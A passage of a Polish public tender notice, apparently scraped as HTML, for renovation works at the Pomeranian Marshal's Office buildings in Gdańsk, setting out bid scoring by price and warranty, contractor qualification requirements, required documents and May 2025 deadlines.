obejmujący: gwarancję jakości przedmiotu zamówienia, niezależnie od krótszego okresu gwarancji jakiego udziela producent urządzeń użytych przez Wykonawcę w celu realizacji zamówienia, w którym Zamawiającemu przysługuje uprawnienie do żądania od gwaranta nieodpłatnego usunięcia wad lub usterek lub dostarczenia rzeczy wolnej od wad. <br/>Termin ten liczony jest od daty odbioru końcowego obiektu. W przypadku, gdy producent na zamontowane urządzenia oferuje dłuższy termin gwarancji niż zaoferowany przez Wykonawcę, wówczas obowiązuje termin gwarancji zaoferowany przez producenta urządzenia. <br/>Minimalny, wymagany przez Zamawiającego termin gwarancji na roboty budowlane i zamontowane urządzenia wynosi 60 miesięcy. <br/>Jeżeli Wykonawca w Formularzu Ofertowym nie zaznaczy żadnego z ww. terminów, Zamawiający przyjmie, że Wykonawca oferuje minimalny/wymagany w SWZ okres gwarancji na roboty budowlane i zamontowane urządzenia tj. 60 miesięcy i otrzyma 0 punktów. <br/>Jeżeli Wykonawca w Formularzu Ofertowym zaznaczy kilka lub wszystkie terminy, Zamawiający przyjmie, że Wykonawca oferuje minimalny/wymagany w SWZ okres gwarancji na roboty budowlane i zamontowane urządzenia tj. 60 miesięcy i otrzyma 0 punktów.<br/><br/>3.	Sposób obliczenia całkowitej liczby punktów:<br/>P = PK1 + PK2 <br/>P – całkowita liczba punktów dla rozpatrywanej oferty<br/>PK1 – liczba punktów uzyskanych w kryterium „Cena brutto wykonania zamówienia”<br/>PK2 – liczba punktów uzyskanych w kryterium „Termin gwarancji na roboty budowlane i zamontowane urządzenia”</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin gwarancji na roboty budowlane i zamontowane urządzenia (PK2)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest: Roboty budowlane w siedzibach Urzędu Marszałkowskiego Województwa Pomorskiego, w podziale na następujące części zamówienia: <br/>2)	Modernizacja pomieszczeń parteru w budynku przy ul. Augustyńskiego 2 w Gdańsku - która będzie polegała na wyodrębnieniu dwóch niezależnych pomieszczeń biurowych z pokoju znajdującego się na parterze budynku. Celem prac jest podniesienie standardu wykończenia wnętrz w tym: zapewnienia właściwej higieny i ergonomii pracy pomieszczeń biurowych, które dostosowane zostaną do potrzeb osób niepełnosprawnych i obowiązujących przepisów. Roboty budowlane w pomieszczeniach należy prowadzić według harmonogramu uzgodnionego z Zamawiającym. Przed rozpoczęciem robót budowlanych Zamawiający usunie z pomieszczeń remontowanych meble oraz sprzęt biurowy i komputerowy.<br/>2.	Charakterystyczne parametry określające usytuowanie i wielkość obiektów:<br/> Budynki znajdują się w strefie ochrony konserwatorskiej miasta Gdańsk.<br/>Część nr 2: Drugi budynek znajduje się u zbiegu ulic Augustyńskiego z Rzeźnicką i Żabim Krukiem w Gdańsku. Budynek jest częścią kompleksu w zabudowie zamkniętej. Budynek ma trzy kondygnacje nadziemne (parter, I piętro, II piętro, III piętro), strych, obiekt jest podpiwniczony. Układ konstrukcyjny ścian nośnych jest podłużny. Ściany konstrukcyjne wykonane z cegły ceramicznej pełnej grubości 51 – 110 cm. Stropy między kondygnacjami typu Klein. Strop nad piwnicą na belkach stalowych. Dach pokryty dachówką ceramiczną.<br/>Budynki wyposażone są w instalacje: wodno-kanalizacyjne, elektryczne, telefoniczne, klimatyzacji, telewizji kablowej, teletechniczne, a także c.o. z węzła zlokalizowanego w pomieszczeniu piwnicznym.<br/>Istniejące instalacje w pomieszczeniach i ciągach komunikacyjnych:<br/>-	Oświetlenie,<br/>-	obwody gniazd użytkowych,<br/>- sieć komputerowa,<br/>-	instalacja alarmowa,<br/>-	instalacja Systemu Automatycznego Powiadamiania o Pożarze (SAP),<br/>-	instalacja hydrantowa,<br/>-	Instalacja klimatyzacji.<br/><br/>3.	Wykonawca może złożyć ofertę na dowolną ilość części zamówienia.<br/>4.	Zamówienie należy zrealizować zgodnie z wymogami zawartymi w: Opisie Przedmiotu Zamówienia stanowiącym załączniki nr 1.1 - 1.2 do SWZ, oraz we wzorach umów stanowiących załącznik nr 2.1 - 2.2 do SWZ.<br/>5.	Minimalny, wymagany przez Zamawiającego termin gwarancji jakości na roboty budowlane i zamontowane urządzenia wynosi 60 miesięcy. Niezależnie od udzielonej gwarancji jakości na roboty budowlane, która stanowi kryterium oceny ofert, Wykonawca ponosi wobec Zamawiającego odpowiedzialność z tytułu rękojmi za wady, na zasadach określonych <br/>w Kodeksie cywilnym, tj. Wykonawca odpowiada z tytułu rękojmi, jeżeli wada fizyczna zostanie stwierdzona przed upływem dwóch lat, a gdy chodzi o wady nieruchomości – przed upływem pięciu lat od dnia odbioru końcowego.<br/>6.	Wykonawca musi przewidzieć zabezpieczenie terenu robót, prace wykonywać zgodnie z przepisami dotyczącymi ochrony środowiska, ochrony przeciwpożarowej, ochrony własności publicznej i prywatnej, bezpieczeństwa i higieny pracy, stosować się do przepisów praw a, zapewnić właściwe materiały i normy związane z wykonaniem zamówienia, zapewnić kontrolę jakości robót oraz dokumentacji potrzebnej do odbioru robót.<br/>7.	Przedmiar robót należy traktować jako dokument pomocniczy, który nie może stanowić jedynej podstawy do obliczenia wynagrodzenia za realizację przedmiotu zamówienia. Zawarte w przedmiarze robót zestawienia mają jedynie zobrazować skalę przedmiotu zamówienia i pomóc Wykonawcom w oszacowaniu kosztów inwestycji.<br/>8.	Wykonawca jest zobowiązany do analizy rozwiązań przedstawionych w dokumentacji SWZ, pod kątem przyjętych rozwiązań technicznych i optymalizacji systemu robót. Wykonawca zobowiązany jest do uzgodnienia rodzaju i kolorystyki użytych materiałów a następnie uzyskania akceptacji od Zamawiającego.<br/>9.	Wykonawca zobowiązany jest do zgłoszenia Zamawiającemu, z minimum jednodniowym wyprzedzeniem, konieczności wykonywania prac popołudniu lub w dni wolne od pracy Urzędu.<br/>10.	Roboty budowlane będą wykonywane w czynnym obiekcie. Roboty hałaśliwe należy wykonać w uzgodnieniu z Zamawiającym, w godzinach popołudniowych – po godzinach pracy Urzędu. Część robót będąca kłopotliwa dla funkcjonowania pracy Urzędu (roboty rozbiórkowe, pył, gruz) wykonywać po uzgodnieniu z Zamawiającym w czasie wolnym od pracy urzędu (dni wolne, weekendy, godziny popołudniowe). Należy uwzględnić i zapewnić możliwość funkcjonowania sąsiednich pomieszczeń. Prowadzone prace nie mogą mieć negatywnego wpływu na ciągi komunikacyjne, budynki i tereny sąsiednie, w tym należytego utrzymania porządku i czystości.<br/>11.	Wykonawca musi przewidzieć zabezpieczenie placu/terenu budowy oraz jego otoczenia przed zabrudzeniem i zniszczeniem. Prace wykonywać zgodnie z przepisami dotyczącymi ochrony środowiska, ochrony przeciwpożarowej, ochrony własności publicznej i prywatnej, bezpieczeństwa i higieny pracy, stosować się do przepisów prawa, zapewnić właściwe materiały i normy związane z wykonaniem zamówienia, zapewnić kontrolę jakości robót oraz dokumentacji potrzebnej do odbioru robót.<br/>12.	Zamawiający nie zastrzega możliwości ubiegania się o zamówienie wyłącznie przez Wykonawców, o których mowa w art. 94 ustawy Pzp.<br/>13.	Zamawiający nie dopuszcza możliwości złożenia oferty wariantowej, o której mowa w art. 92 ustawy Pzp, tzn. oferty przewidującej odmienny sposób wykonania zamówienia niż określony w niniejszej SWZ.<br/>18.	Zamawiający nie przewiduje zawarcia umowy ramowej i ustanowienia dynamicznego systemu zakupów oraz nie przewiduje wyboru oferty najkorzystniejszej z zastosowaniem aukcji elektronicznej. <br/>19.	Zamawiający nie przewiduje udzielania zamówień na podstawie art. 214 ust. 1 pkt 7 ustawy Pzp.<br/>20.	Zamawiający nie dopuszcza składania oferty w postaci katalogów elektronicznych ani dołączania katalogów elektronicznych do oferty, w sytuacji określonej w art. 93 ustawy Pzp.<br/>21.	Zamawiający nie przewiduje rozliczenia w walutach obcych. Rozliczenie zamówienia prowadzone jest w PLN. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45331220-4 - Instalowanie urządzeń klimatyzacyjnych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">42 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Wszystkie oferty niepodlegające odrzuceniu oceniane będą na podstawie następujących kryteriów:<br/><br/>Dotyczy zarówno części 1 nr i części nr 2 zamówienia:<br/><br/>Kryterium:<br/>1.	Cena brutto wykonania zamówienia (PK1) - waga 90%<br/>2.	Termin gwarancji na roboty budowlane i zamontowane urządzenia (PK2) - waga 10%<br/><br/>Przy czym [1% = 1 pkt].<br/><br/>2.	Sposób przyznawania punktów:<br/>1)	dla kryterium: „Cena” (PK1):<br/>Przez kryterium Cena brutto wykonania zamówienia Zamawiający rozumie całkowity koszt brutto realizacji całości zamówienia. Do oceny Zamawiający przyjmuje cenę brutto wpisaną przez Wykonawcę do formularza ofertowego, którego wzór stanowi załącznik nr 3 do SWZ.<br/>Sposób obliczenia:<br/>PK1 = [CN / CR x 90 %] x 100<br/>PK1	– ilość punktów dla kryterium <br/>CN	– najniższa oferowana cena <br/>CR	– cena oferty rozpatrywanej<br/><br/>2)	dla kryterium: “Termin gwarancji na roboty budowlane i zamontowane urządzenia” (PK2):<br/>W kryterium „Termin gwarancji na roboty budowlane i zamontowane urządzenia” Zamawiający przyzna następującą punktację: <br/>•	Zaoferowanie przez Wykonawcę minimalnego okresu gwarancji na roboty budowlane i zamontowane urządzenia 60 miesięcy - oferta Wykonawcy otrzyma 0 punktów;<br/>•	Zaoferowanie przez Wykonawcę okresu gwarancji na roboty budowlane <br/>i zamontowane urządzenia ponad wymagane minimum (60 miesięcy), tj. na okres 72 miesięcy (dodatkowo 12 miesięcy) - oferta Wykonawcy otrzyma 5 punktów; <br/>•	Zaoferowanie przez Wykonawcę okresu gwarancji na roboty budowlane <br/>i zamontowane urządzenia ponad wymagane minimum (60 miesięcy), tj. na okres 84 miesięcy (dodatkowo 24 miesiące) - oferta Wykonawcy otrzyma 10 punktów.<br/>Przy czym przez: „Termin gwarancji na roboty budowlane i zamontowane urządzenia” należy rozumieć oferowany przez Wykonawcę okres, liczony w miesiącach, obejmujący: gwarancję jakości przedmiotu zamówienia, niezależnie od krótszego okresu gwarancji jakiego udziela producent urządzeń użytych przez Wykonawcę w celu realizacji zamówienia, w którym Zamawiającemu przysługuje uprawnienie do żądania od gwaranta nieodpłatnego usunięcia wad lub usterek lub dostarczenia rzeczy wolnej od wad. <br/>Termin ten liczony jest od daty odbioru końcowego obiektu. W przypadku, gdy producent na zamontowane urządzenia oferuje dłuższy termin gwarancji niż zaoferowany przez Wykonawcę, wówczas obowiązuje termin gwarancji zaoferowany przez producenta urządzenia. <br/>Minimalny, wymagany przez Zamawiającego termin gwarancji na roboty budowlane i zamontowane urządzenia wynosi 60 miesięcy. <br/>Jeżeli Wykonawca w Formularzu Ofertowym nie zaznaczy żadnego z ww. terminów, Zamawiający przyjmie, że Wykonawca oferuje minimalny/wymagany w SWZ okres gwarancji na roboty budowlane i zamontowane urządzenia tj. 60 miesięcy i otrzyma 0 punktów. <br/>Jeżeli Wykonawca w Formularzu Ofertowym zaznaczy kilka lub wszystkie terminy, Zamawiający przyjmie, że Wykonawca oferuje minimalny/wymagany w SWZ okres gwarancji na roboty budowlane i zamontowane urządzenia tj. 60 miesięcy i otrzyma 0 punktów.<br/><br/>3.	Sposób obliczenia całkowitej liczby punktów:<br/>P = PK1 + PK2 <br/>P – całkowita liczba punktów dla rozpatrywanej oferty<br/>PK1 – liczba punktów uzyskanych w kryterium „Cena brutto wykonania zamówienia”<br/>PK2 – liczba punktów uzyskanych w kryterium „Termin gwarancji na roboty budowlane i zamontowane urządzenia”</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin gwarancji na roboty budowlane i zamontowane urządzenia (PK2)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie przedmiotowego zamówienia mogą się ubiegać Wykonawcy, którzy spełniają warunki udziału w postępowaniu określone przez Zamawiającego. <br/>2.	Zamawiający wymaga spełnienia warunków udziału w postępowaniu, w zakresie zdolności technicznej lub zawodowej:<br/>1)	W zakresie części nr 1:<br/>a)	Wykonawca wykaże, że posiada wiedzę i doświadczenie, co należycie udokumentuje tj. wykaże, że w okresie ostatnich 5 lat licząc wstecz od dnia, w którym upływa termin składania ofert w niniejszym postępowaniu, a jeśli okres prowadzenia działalności jest krótszy – w tym okresie, należycie wykonał co najmniej:<br/>•	Dwie roboty budowlane polegające na remoncie dachu, o powierzchni całkowitej nie mniejszej niż 50 m², przy czym każda z robót obejmowała swoim zakresem co najmniej: roboty rozbiórkowe, roboty budowlane związane z konstrukcją oraz pokryciem dachu dachówką ceramiczną;<br/>•	Dwie roboty budowlane polegające na remoncie dachu na budynku o wysokości kalenicy co najmniej 12 m, każda z robót.<br/>Przez dwie roboty budowlane rozumie się roboty wykonane na podstawie dwóch różnych umów.<br/>b)	Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że skieruje do realizacji niniejszego zamówienia:<br/>•	Jedną osobę, która obejmie funkcję kierownika budowy:<br/>o	posiadającą minimum 5 letnie doświadczenie w kierowaniu robotami jako kierownik budowy, <br/>o	posiadającą uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń, w specjalności konstrukcyjno - budowlanej (lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej lub innych obowiązujących przepisów).<br/>2)	W zakresie części nr 2:<br/>a)	Wykonawca wykaże, że posiada wiedzę i doświadczenie, co należycie udokumentuje tj. wykaże, że w okresie ostatnich 5 lat licząc wstecz od dnia, w którym upływa termin składania ofert w niniejszym postępowaniu, a jeśli okres prowadzenia działalności jest krótszy – w tym okresie, należycie wykonał co najmniej:<br/>•	Dwie roboty budowlane polegające na przebudowie, remoncie pomieszczeń biurowych, o powierzchni całkowitej nie mniejszej niż 20 m², obejmującą swoim zakresem co najmniej, roboty wyburzeniowe, roboty budowlane - każda z robót. Przez dwie roboty budowlane rozumie się roboty wykonane na podstawie dwóch różnych umów.<br/>b)	Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że skieruje do realizacji niniejszego zamówienia:<br/>•	Jedną osobę, która obejmie funkcję kierownika robót budowlanych, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi <br/>w specjalności konstrukcyjno – budowlanej (lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniejszych lub innych obowiązujących przepisów);<br/>•	Jedną osobę, która obejmie funkcję kierownika robót branży elektrycznej, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji <br/>i urządzeń elektrycznych i elektroenergetycznych (lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów prawa w zakresie niezbędnym do wykonania przedmiotu zamówienia).<br/>•	Jedną osobę, która obejmie funkcję kierownika robót branży telekomunikacyjnej, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń telekomunikacyjnych (lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów prawa w zakresie niezbędnym do wykonania przedmiotu zamówienia).<br/>UWAGA:<br/>-	dla potrzeb oceny spełniania warunków określonych powyżej, jeśli wartości zostaną podane w walutach innych niż złoty, Zamawiający przyjmie średni kurs złotego do tej waluty podawany przez Narodowy Bank Polski na dzień opublikowania ogłoszenia w Dzienniku Urzędowym Unii Europejskiej. W przypadku publikacji ogłoszenia w sobotę, Zamawiający dokona przeliczenia tej waluty na PLN według średniego bieżącego kursu wyliczonego i ogłoszonego przez Narodowy Bank Polski z pierwszego dnia roboczego następującego po dniu opublikowania ogłoszenia o zamówieniu <br/>w Dzienniku Urzędowym Unii Europejskiej,<br/>-	ocena wykazania spełnienia warunku określonego w pkt 1a) i 2a) powyżej nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów, o których mowa w rozdz. X ust. 1 pkt 1 SWZ (wzór wykazu należycie wykonanych robót stanowi załącznik nr 5 do SWZ),<br/>-	ocena wykazania spełnienia warunku określonego w pkt 1b) i 2b) powyżej nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów, o których mowa w rozdz. X ust. 1 pkt 1 SWZ (wzór wykazu osób skierowanych do realizacji zamówienia publicznego stanowi załącznik nr 6 do SWZ),<br/>-	jeżeli Wykonawca w celu potwierdzenia spełniania warunków udziału w postępowaniu określonych w pkt 1a) lub 2a) polega na zdolnościach technicznych lub zawodowych innego podmiotu, warunek określony w pkt 1a) lub 2a) zostanie uznany za spełniony, jeżeli spełnia go w całości ten podmiot.<br/>-	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, warunek udziału w postępowaniu określony w pkt 1a) lub 2a) zostanie uznany za spełniony, jeżeli spełnia go przynajmniej jeden z Wykonawców wspólnie ubiegających się o zamówienie.<br/>-	Przez uprawnienia budowlane rozumie się uprawnienia do sprawowania samodzielnych funkcji technicznych w budownictwie, wydane na podstawie ustawy Prawo budowlane oraz rozporządzenia Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2019 r. poz. 831) lub odpowiadające im inne ważne uprawnienia budowlane wydane na mocy wcześniej obowiązujących przepisów prawa w zakresie niezbędnym do wykonania przedmiotu zamówienia.<br/>-	W przypadku obywateli państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej muszą oni spełniać wymogi określone w art. 12a ustawy Prawo budowlane, z których wynika, że samodzielne funkcje techniczne w budownictwie mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (tj. Dz. U. z 2023 r. poz. 334). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie żąda podmiotowych środków dowodowych na potwierdzenie braku podstaw wykluczenia. Tym samym, Zamawiający dokona weryfikacji wyłącznie na podstawie oświadczenia wstępnego.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	Zamawiający żąda podmiotowych środków dowodowych na potwierdzenie spełnienia warunków udziału w postępowaniu, tym samym:<br/>1)	zgodnie z art. 274 ust. 1 ustawy Pzp, zamawiający przed wyborem najkorzystniejszej oferty wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych:<br/>a)	wykaz robót budowlanych - na potwierdzenie spełnienia warunku udziału <br/>w postępowaniu określonego w rozdz. VIII ust. 2 pkt 1a i 2a SWZ, zrealizowanych w okresie ostatnich 3 lat licząc wstecz od dnia, w którym upływa termin składania ofert w niniejszym postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, daty i miejsca wykonania i podmiotów, na rzecz których roboty zostały wykonane (według wzoru stanowiącego załącznik nr 5 do SWZ) oraz załączenie dowodów określających czy te roboty zostały wykonane należycie, przy czym dowodami są:<br/>•	referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty zostały wykonane,<br/>•	oświadczenie Wykonawcy, jeżeli Wykonawca z przyczyn niezależnych od niego, nie jest w stanie uzyskać tych dokumentów.<br/><br/>b)	wykaz osób (według wzoru stanowiącego załącznik nr 6 do SWZ) - na potwierdzenie spełnienia warunku udziału w postępowaniu określonego w Rozdz. VIII ust. 2 pkt. 1b i 2b SWZ - skierowanych przez wykonawcę do realizacji zamówienia publicznego wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia niezbędnych do wykonania zamówienia publicznego oraz informacją o podstawie do dysponowania tymi osobami.<br/>2)	jeżeli zachodzą uzasadnione podstawy do uznania, że uprzednio podmiotowe środki dowodowe nie są już aktualne, Zamawiający może w każdym czasie wezwać Wykonawcę lub Wykonawców do złożenia wszystkich lub niektórych podmiotowych środków dowodowych, aktualnych na dzień ich złożenia,<br/>3)	Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne (t.j. Dz. U. z 2024 r. poz. 307), <br/>o ile Wykonawca wskazał w oświadczeniu wstępnym dane umożliwiające dostęp do tych środków.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie żąda złożenia przez Wykonawcę przedmiotowych środków dowodowych. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Dokumenty składane razem z ofertą:<br/>- Oferta składana jest pod rygorem nieważności w formie elektronicznej podpisana kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym, w ogólnie dostępnych formatach danych, w szczególności w formatach: .txt, .rtf, .pdf, .doc, .docx, .odt. Oferta musi być sporządzona w języku polskim. Do przygotowania oferty zaleca się skorzystanie z Formularza oferty, stanowiącego załącznik Nr 3 do SWZ. W przypadku gdy Wykonawca nie korzysta z przygotowanego przez Zamawiającego wzoru Formularza oferty, oferta powinna zawierać wszystkie istotne informacje wymagane we wzorze.<br/>- oświadczenie o niepodleganiu wykluczeniu - zgodnie z rozdziałem IX SWZ;<br/>- pełnomocnictwo - w sytuacjach określonych w rozdziale IX SWZ;<br/>- zobowiązanie podmiotu trzeciego - w sytuacjach określonych w rozdziale IX<br/>SWZ;<br/>- oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia - w sytuacjach określonych w rozdziale IX SWZ;<br/>- Zastrzeżenie tajemnicy przedsiębiorstwa - w sytuacjach określonych w rozdziale IX SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Oświadczenia o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu. Oświadczenie składają odrębnie:<br/>- każdy spośród wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum,spółka cywilna). W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia wykonawcy oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>2. W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia (konsorcjum,spółka cywilna) wykonawcy zobowiązani są do ustanowienia pełnomocnika. Dokument pełnomocnictwa, z treści którego będzie wynikało umocowanie do reprezentowania w postępowaniu o udzielenie zamówienia tych wykonawców albo do reprezentowania w<br/>postępowaniu i zawarciu umowy w sprawie zamówienia publicznego należy załączyć do oferty. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> W zakresie części nr 1 zmiany do umowy zostały uregulowane w § 18 projektu umowy<br/>W zakresie części nr 2 zmiany do umowy zostały uregulowane w § 17 projektu umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-05-14 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/pomorskie</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-05-14 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-06-12</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Podstawy wykluczenia Wykonawców na podstawie art 108 ust. 1 ustawy pzp zostały wskazane w SWZ w Rozdziale VII ust. 2.<br/>2. Zamawiający wykluczy z postępowania o udzielenie zamówienia Wykonawców, o których mowa w art. 7 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (tj. Dz. U. z 2024 r. poz. 507).<br/>3. Wykonawca, w dniu podpisania umowy, złoży aktualne na dzień składania oświadczenia, że:<br/>- nie podlega wykluczeniu w zakresie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (tj. Dz. U. z 2024 r. poz. 507).<br/>4. Przed zawarciem umowy Wykonawca, którego oferta zostanie wybrana, 